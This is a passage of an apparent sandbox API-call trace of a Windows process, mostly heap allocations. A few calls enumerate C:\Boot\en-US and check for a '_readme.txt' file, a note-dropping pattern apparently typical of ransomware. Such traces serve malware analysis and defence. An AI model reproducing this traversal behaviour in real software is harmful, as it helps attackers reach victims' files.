returned 0x3240a28 [0146.495] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.495] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.495] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.495] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.496] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.496] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.496] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.496] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0146.496] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.496] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.496] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.496] PathFindFileNameW (pszPath="") returned="" [0146.496] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.496] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.497] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.497] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.497] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.497] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.497] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.497] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.497] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0146.497] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.497] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.497] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0146.498] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.498] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.498] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ead3730, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ead3730, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.498] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.498] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ead3730, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ead3730, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.498] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.498] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0146.498] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ead3730, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ead3730, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ead3730, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.499] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ead3730, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ead3730, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ead3730, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.499] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.499] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.499] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.499] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.499] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.499] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.499] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.499] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.499] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.499] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.499] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.499] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.499] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.499] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.499] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.499] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.499] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.499] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.499] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.499] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.499] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.499] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.499] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.499] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.499] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.499] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.499] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.499] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.499] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.499] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.499] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.499] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.499] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.499] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.500] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.500] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.500] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.500] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.500] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.500] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.500] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.500] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.500] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.500] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.500] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.500] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.500] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.500] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.500] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.500] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.500] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.500] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.500] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.501] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.501] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.501] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.501] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.501] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.501] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.501] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.501] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.501] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.501] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.501] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.501] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.501] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.501] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.501] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.501] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.501] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.501] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.501] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.501] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.501] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.501] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.501] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.501] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.501] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.501] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.501] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.501] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.501] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.501] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.501] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.501] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.501] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.501] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.501] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.501] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.501] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.501] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.502] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.502] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.502] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.502] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.502] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.502] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.502] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.502] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.502] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.502] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.502] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.502] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.502] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.502] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.502] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.502] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.502] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.502] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.502] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.503] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.503] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.503] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.503] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.503] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.503] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.503] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.503] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.503] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.503] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.503] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.503] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.503] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.503] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.503] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.503] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.503] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.503] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.503] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.503] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.503] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.503] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.503] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.503] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.503] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.503] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.503] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.503] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.503] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.503] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.503] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.503] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.503] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.503] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.503] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.503] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.503] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.503] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 